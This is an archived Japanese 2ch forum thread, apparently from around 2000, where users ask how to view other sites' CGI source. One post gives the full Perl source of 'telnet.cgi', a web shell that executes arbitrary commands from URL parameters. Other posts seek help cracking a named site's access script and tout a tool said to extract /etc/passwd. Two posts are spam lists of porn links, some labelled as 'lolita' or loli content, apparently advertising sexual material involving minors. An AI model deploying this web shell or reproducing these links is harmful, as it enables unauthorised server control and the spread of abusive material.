トップページhack
118コメント42KB

CGIのソースってどうすればみれますか?

■ このスレッドは過去ログ倉庫に格納されています
0001名無しさん@1周年NGNG
人のページのCGIソースがみたいです。
どうすればみれますか?
どうか教えてください
0002名無しさん@1周年 NGNG
エディタで見れ
0003名無しさん NGNG
メモ帳で見れ
0004名無しさん NGNG
メールを送れ
0005名無しさん@1周年 NGNG
あ、それ俺も知りたい。
0006NGNG
どうやるの?
不可能?
0007dj NGNG
CGIのソースっていう言葉が笑える
0008名無しさん NGNG
     ヽ川/
   __|Ξ| _
  /        \
 |  (・)   (・) |  / ̄ ̄ ̄ ̄ ̄
⊂      ..    |⊃<  ソースは?
 |  一┬┬┬一.  |  \_____
 |    └┴┘   |
 \______ノ
0009C61> NGNG
catでみれ
0010mm NGNG
tripodはさいごにすらっしゅでみれる 
0011名無しさん@mmさんありがとう NGNG
いままでそうとは知らずに使ってました。
どういう原理でこんなことできるのでしょうか。
誰か知っていたら教えてください。
0012奈々 NGNG
http://ユーザーID.virtualave.net/cgi-bin/ で見れる(ネタ)
0013ななちゃん NGNG
age
0014長渕剛 NGNG
探検君
0015馬鹿 NGNG
要するにお前ら分からないんだろうが(ヒヒ
掘ってけば見つかる(ヒヒ
0016ERROR:名前いれてちょ NGNG
右手でモーパイ
0017名無しさん NGNG
そんなの見たってブルドックの絵しか書いてないよ!
0018hage NGNG
telnet.cgi wo oite >>9
0019名無しさーん NGNG
>18
telnet.cgi下さい
0020名無しさん NGNG
>14
探検君下さい
0021名無しさん@そうだ選挙にいこう NGNG
>15
掘ってけば、ってどういう意味なの?
すまん、ドキュソなもんで。
決め打ちとかじゃないよね?
0022Mrs.名無しさん NGNG
>20
『ハッキングマニュアル2000』の付録CDに
入ってたよ<探検くん
002320 NGNG
>Mrs.名無しさん
ありがとう!
でも本屋さんにありませんでした。。。
002420 NGNG
>19 20です 偶然持ってたのであげときます<telnet.cgi
#!/usr/bin/perl
$ownname="http://$ENV{'SERVER_NAME'}$ENV{'SCRIPT_NAME'}";
$ENV{'PATH'} = '/bin'
. ':/usr/bin'
. ':/usr/ucb'
. ':/etc'
. ':/usr/etc'
. ':/usr/lib'
. ':/usr/local/bin'
. ':/usr/local/X11R6/bin'
. ':/usr/local/bin/mh'
. ':/usr/local/lib'
. ':/usr/local/lib/mh'
. ':/usr/local/sbin'
. ':/usr/local/libexec'
. ':/usr/local/canna/bin'
;

($dir,$cmd)=split('&',$ENV{'QUERY_STRING'}); # & で分離 dir=????&cmd=

$dir =~ s/dir=//;
$dir =~ s/%(..)/pack('c',hex($1))/ge;

$cmd =~ s/cmd=//;
$cmd =~ s/\+/ /g;
$cmd =~ s/%(..)/pack('c',hex($1))/ge;

$|=1;

print "Content-type: text/html\n\n";
print '<HTML><BODY>';
print "<PRE>\n";

# ----------------------------------------------------------------------
chdir("$dir");
$wd=&pwd;
print "Curr Dir:$wd\n";

# ----------------------------------------------------------------------

$cmdpr = $cmd;
$cmdpr =~ s/&/&amp;/g;
$cmdpr =~ s/</&lt;/g;
$cmdpr =~ s/>/&gt;/g;
print "\n<B>&gt;$cmdpr</B>\n";

# ----------------------------------------------------------------------
if ($cmd =~ /^cd(\s)*/ ) { # cd は、内部で処理する。
unless (chdir($')) {
print "cd $':not success.\n";
}
$dir=&pwd;
print "Curr Dir:$dir\n";
} else {
open(PROC,"$cmd 2>&1 |"); # 実行

while (<PROC>) { # 結果を読み出す

s/</\001/g; #
s/>/\002/g; #

s/(.)(\x08\1)+/<B>$1<\/B>/g; # 多重打ち : . 08h(BS) .
s/_\x08(.)/<U>$1<\/U>/g; # アンダーライン : 5fh(_) 08h(BS)
s/o\x08\+/<S>X<\/S>/g; # リストマーク : 35h(o) 08h(BS) 2bh(+)

s/<\/(.)><\1>//g; # </TAG><TAG> を削除

s/&/&amp;/g; #
s/\001/&lt;/g; #
s/\002/&gt;/g; #

print $_;
}
close(PROC);
}
# ----------------------------------------------------------------------
print "</PRE>\n";

print '<HR>';

print '<FORM ACTION="' . $ownname . '" METHOD="GET">';
print '<INPUT TYPE="hidden" NAME="dir" VALUE="' . $dir . '">';
print '<INPUT TYPE="text" NAME="cmd" SIZE=80 VALUE="' . $cmd . '">';
print '<INPUT TYPE="submit" VALUE="Send">';
print '</FORM>';
print '</BODY></HTML>';
exit;
# ----------------------------------------------------------------------
sub pwd {
use Cwd;
$wd = Cwd::getcwd();
unless ($wd) {
$wd='/';
}
return $wd;
}
002519 NGNG
>20
ありがとうございます
研究につかわしていただしきます(^-^)
0026名無しさん NGNG
>25
この程度のスクリプト位、自分で組めるようにならないと…
0027おちんぽさん NGNG
確かに・・。
0028こんにゃろ NGNG
telnet.cgi設置後どうやって使うのよ
002920 NGNG
とりあえず textbox に "ls"
0030林檎 NGNG
>20 22です。
telnet.cgiの使い方の解説を希望!
メルでもおけです。よろしくです。m(_ _)m
0031名無しさん NGNG
UNIX板にでも逝けば?
0032名無しさん NGNG
http://www.urban.ne.jp/home/geh02166/
のshutout.cgiをクラックしたいのだが。
ソースが読めにゃい。
困ったちゃんなので助けて下さい。
お願いが一つ、絶対に掲示板は荒らさないでちょんまげ。
隠しページに逝きたいだけですので。
0033a NGNG
女女
http://www.hardcore-space.com/jiggerman/janine3.mpg (9M)
http://www.btinternet.com/~jfulton/kristaAllenz.mpg (5M)
http://members.fortunecity.com/backupneed21/home/jjsat_vib08_uv.mpg (2M)

黒2本(5M)
http://movies.hardcore-space.com/drp/37.avi

黒女(5M)
http://home.beseen.com/alumni/theguardian4321/emily10.mpg

ソフト(3〜4M)
http://www.btinternet.com/~jfulton/AshleyJudd.mpeg
http://perso.worldonline.fr/bdesire/bin/Alyssa_Milano_9a.mpg
http://www.celebrityscope.com/Mpeg7013/Westcott1.mpg

炉 (2M程)
http://dutchteam.sunhosting.com/mpeg/AMY/amy-1.mpg
http://dutchteam.sunhosting.com/mpeg/AMY/amy-2.mpg
http://dutchteam.sunhosting.com/mpeg/AMY/amy-**.mpg (** = 10〜29)
http://www.teentops.com/tour/storyboards/mimi-01.mpg
http://members.fortunecity.com/needformovies/home/lolita6.mpg

速(4M)
http://members.tripodasia.com.sg/mlinxxx/MINNIE10.avi

屋外 (3〜8M)
http://giantmovies.eythan.com/movies/mov*.asf (* = 4〜6)
http://64.224.111.150/029381aodfjialolita/Jill0*.avi (* = 1〜4)
http://movies.hardcore-space.com/drp/41.avi
http://members.fortunecity.com/needformovies/home/gbg17a.avi (* = a〜d)

毒液(1〜6M)
http://64.78.144.50/cumshot/7/dk*.mpeg (* = 1〜10、5は.avi)
http://64.225.254.254/cumlaur*.mpg (* = 1〜3)
http://hometown.aol.com/lightspeed36/mywebpages/DIV0000*.MP3 (* = 0〜3:mpg)
http://members.fortunecity.com/rwilli01/blueshirt.mpeg
http://members.fortunecity.com/rwilli01/masksplash.mpeg
http://members.fortunecity.com/rwilli01/covermyboobs.mpeg
0034a NGNG
http://home.beseen.com/alumni/theguardian9000/lexis01.mpeg
http://home.beseen.com/alumni/theguardian9000/lexis04.mpeg
http://home.beseen.com/alumni/theguardian9000/lilly1.mpeg
http://home.beseen.com/alumni/theguardian4321/emily09.mpg
http://home.beseen.com/alumni/theguardian4321/emily10.mpg
http://home.beseen.com/alumni/theguardian4321/emily11.mpg

0035エロ動画も結構だが NGNG
こちらもよろしく。
http://www.urban.ne.jp/home/geh02166/
のshutout.cgiをクラックしたいのだが。
ソースが読めにゃい。
困ったちゃんなので助けて下さい。
お願いが一つ、絶対に掲示板は荒らさないでちょんまげ。
隠しページに逝きたいだけですので。
0036胡蝶 NGNG
クラックしたいって何ですか(笑)具体的に何がしたいの?
別に悪さしないんならwww.urban.ne.jp/home/geh02166/を信頼済みサイトに登録すればいいんじゃないの?

つーか<META HTTP-EQUIV="Refresh" CONTENT="0;URL=./noscript.htm">
を消せばどうにでもなるだろ・・・。少しは考えろよ。

掲示板はこちら
http://hpcgi1.nifty.com/pon-nura/light.cgi
003735 NGNG
>>36
それじゃねーよでございます。 htmlぐらい読めます。
左下角の変なボタンのリンク先がcgiでブロックされているので
その先に逝きたいんです。
そのcgiのソースを読みたいので読み方を教えて下さい。
0038>37 NGNG
んなもん配布されてないのに読めるわけがない。
てかその先なんてありませんよ。
0039名無しさん@1周年 NGNG
初級ネットワークというよりは、
いたずらティーンズっていう感じのノリだねぇ
0040あくび NGNG
>>37
つかmethod=getだ。適当に遊べや。。。&hearts;&Yuml;
0041名無しさんMe NGNG
結局使い方ってどうするんですか?
ひょっとして自分も見たいCGIの置いてあるサーバーにアカウントもってないと
見れないってわけですか?
0042初級ネットワーク@2ch掲示板 NGNG
初級ネットワーク@2ch掲示板

罠を張っています。
荒らし依頼には、裁判の証拠資料として提出
できるように準備しています。

民事訴訟の費用だけでも高額ですから
気まぐれで人生を棒に振らないように。 ■ ▼
タイトル:
名前: E-mail(省略可):
内容:
書き込む前に読んでね

最後のページ 次のページ i−mode 過去ログメニュー FAQ リロード確認くん ハッククラック Windows 躁鬱

1 : 隠れページをあぶり出す (2)  2 : CGIのソースってどうすればみれますか? (32)  3 : 御堂岡抹殺命令 (5)  4 : ミレアニム・ハッカーの俺に聞きたいことある? (201)  5 : 隠れページをあぶり出す(1)  6 : 多重串のやり方をおしえてください (89)  7 : 電番抜きたい! (2)  8 : IP分かると、個人で何ができるんだ? (46)  9 : グヌーテラ (36)  10 : トロイの木馬についておしえてください。 (119)  11 : 串下さい (16)  12 : sub7最新版 (28)  13 : 名前を赤く (752)  14 : クラックコンテスト@In JAPAN (225)  15 : ブラクラを味わってみたい (69)  16 : 書き込んだ奴のIPを引き抜く方法。 (12)  17 : 侵入してきた相手のIPが分かったのですが (19)  18 : ●スキルのある方々へ、 (4)  19 : 最新の尻の一覧(1)  20 : wakwakざんまい。隣のIP、ルータ設定ページ (9)  21 : 実際のアリスリデルってどんな奴だったの? (2)   22 : t-cupを使っている掲示板をぶっこわしたい (59)   23 : ★串の変数を吐かない串求む★ (65)   24 : ★ランキングで不正にアクセス数を稼ぐ方法★ (21)   25 : 侵入された (33)   26 : しょうもない質問はここにかきこめ (49)   27 : メール欄に#abornの次は、名前欄にfusianasan (454)   28 : 愛知県名古屋市ゼロさい半 (3)   29 : 辞書 (51)   30 : Cannal DUKE (147)   31 : こんな管理者どう思う? (25)   32 : 文字をオレンジにできる? (120)   33 : 結局誰が日本最強のハッカーなの? (190)   34 : 規制にかからない串 (2)   35 : 名前が赤いぜ (796)   36 : ハッカー気分を味わいたい! (16)   37 : ジオシティーズ消滅!! (15)   38 : サーバーのログ (12)   39 : メールの監視 (21)   40 : ソースで確認できないIPの代表的な確認方法 (27)   41 : 本日回転!!論毛様のハッキング道場 (81)   42 : パスワード (4)   43 : ■■■IPから接続ポイント検索したい■■■ (17)   44 : DUKE撃ち放題 (27)   45 : 掲示板などのPASSの探し方 (11)   46 : 名前欄にfusianasanの次は IP 抜きだゴルァ% (64)   47 : Jhon the ripper (34)   48 : ジャパトラ閉鎖? (36)   49 : ☆プロクシと分からない串教えて下さい☆ (4)   50 : 自作自演を見抜く方法を教えて下さい (16)   51 : SPAM情報 (16)   52 : ハッキングしても大丈夫なサーバーを教えてください (8)   53 : 追い込み (26)   54 : 串刺さなくてもいいよね (5)   55 : 23歳からハッカーってどうですか? (6)   56 : ★cgi串の配布サイトちょうだい (9)   57 : 盗用疑惑?(ワラ (177)   58 : ヤフー板から抜粋 (3)   59 : メールのコンテンツチェックをサーバでしたい (5)   60 : ハイパーのPwdファイルって何処に格納されてるの? (8)   61 : もうあきた!!!! (6)   62 : サーバーの初期設定等をしてくれる業者さん(1)   63 : なんか面白い話ない? (12)   64 : イタズラ電話撃退方法を!! (32)   65 : DOM攻撃?始まるよ! (3)   66 : 【ループメールの危機管理】 (9)   67 : IP偽装の仕方教えてください (52)   68 : DOS攻撃って何? (22)   69 : みなさんハックの本は (10)   70 : guburidukeの使い方教えて (17)   71 : イタ電のソフト
0043>41 NGNG
多分そうなんじゃないの?
後は、目的のサーバにtelnetでログインするとか。知らないけど。
0044名無しさん NGNG
telnet.cgiってUNIXコマンド実行するだけじゃん…。
(ソースから見るからに…)
その位のこと分かれよ。
0045sage NGNG
>43
ネタにマジレス、カコワルイ
0046sage NGNG
>43
ネタにマジレスつける奴が多いな、このスレッドは
0047名無しさん NGNG
News::NNTPClient::SOCK1 connecting to kitanet.ne.jp:119
News::NNTPClient::SOCK1 result(200): news.kitanet.ne.jp InterNetNews NNRP server INN 2.2.2 13-Dec-1999 ready (posting ok).
News::NNTPClient::SOCK1 command: NEWNEWS * 001012 232225
News::NNTPClient::SOCK1 result(230): New news follows
News::NNTPClient::SOCK1 received 0 lines
News::NNTPClient::SOCK1 command: LIST
News::NNTPClient::SOCK1 result(215): Newsgroups in form "group high low flags".
News::NNTPClient::SOCK1 received 9 lines
News::NNTPClient::SOCK1 command: XHDR Xref <[email protected]>
News::NNTPClient::SOCK1 result(221): 0 Xref header of article <[email protected]>.
News::NNTPClient::SOCK1 received 1 lines
News::NNTPClient::SOCK1 command: GROUP 2ch.test
News::NNTPClient::SOCK1 result(211): 19 1 19 2ch.test
News::NNTPClient::SOCK1 command: XOVER 19
News::NNTPClient::SOCK1 result(224): data follows
News::NNTPClient::SOCK1 received 1 lines
News::NNTPClient::SOCK1 command: BODY 19
News::NNTPClient::SOCK1 result(222): 19 <[email protected]> body
News::NNTPClient::SOCK1 received 13 lines
News::NNTPClient::SOCK1 command: QUIT
News::NNTPClient::SOCK1 result(205): .
0048千葉賢人 NGNG
スクリプトってなんだ?
0049名無死酸 NGNG
安芸揚げ
0050名無しさんMe NGNG
メールを出すんです >1 ソースを見せてくださいって。
0051743 NGNG
例えば、
http://hogehoge.virtualave.net/cgi-bin/main.cgi
のmain.cgiのスクリプトソースを見るとき、
telnetでどうコマンドを打てばいいですか?
0052逝ってくれ NGNG
>743
fortune startrec
0053名無しさん@1周年 NGNG
[hoge@local]$ telnet remote
[hoge@remote]$ cd /home/httpd/cgi-bin
[hoge@remote]$ su -c "more main.cgi"
[hoge@remote]$ exit
0054aknd;f NGNG
lad:f
0055基地外バカ NGNG
これってxorとか分からなきゃダメ?
0056こんにゃろ NGNG
catで403が出たときは見れないの?
こんにゃろ
0057名無しさん@1周年 NGNG
http://cgi2.osk.3web.ne.jp/~ballon/base_BBS/yybbs.BAK
http://cgi2.osk.3web.ne.jp/~ballon/base_BBS/
0058 NGNG
0059ネゴシエーター NGNG
※初心者的回答
>人のページのCGIソースがみたいです。

素直に中身見せてって言った方が早いんでない?
それと、ほとんどのcgiが一般配布のモノを使ってるから、
配布元に行ってダウンロードした方が早いと思うよ。

普通に見ようとしても、パーミッションの関係で無理じゃないかな。
ここにいる人たちなら無理矢理見る方法とか知ってるんだろうけど。
0060とんち博士 NGNG
>ここにいる人たちなら無理矢理見る方法とか知ってるんだろうけど。
確実に見る方法はないずら。
カンニングに確実な方法が無いのと同じずら。
とんち博士に勝利あり。
0061名無しさん NGNG
>無理矢理見る方法
某鯖では、昔は出来たが今はできなくなった。
最近は、厨房が多くてかなり規制が厳しくなってきているしな。

いい加減にしておかないと、
またシェルコマンドの実行禁止等の
規制がかかったらどうなる事やら…。
0062こんにゃろ NGNG
>無理矢理見る方法
教えてくださいまへ
0063名無しさん NGNG
教えてと言う前に自分で努力をしたことある?>62
0064>> 62 NGNG
覗きたいCGIが有る鯖に垢取ってそこから始めろ。
0065>64 NGNG
もうやめろ
0066発掘君 NGNG
http://jump.uranews.com/galaxy/
ここに、発掘君っていう究極スクリプトがあるよ。
マジでuseful!なんか、設置サーバーのファイルとかディレクトリ覗けるし。
もちろん、CGIも/etc/passwdも抜けるよ。
0067s NGNG
俺は別のサーバーからどこのCGIでもソース見れるもの作ったぜ。
■ このスレッドは過去ログ倉庫に格納されています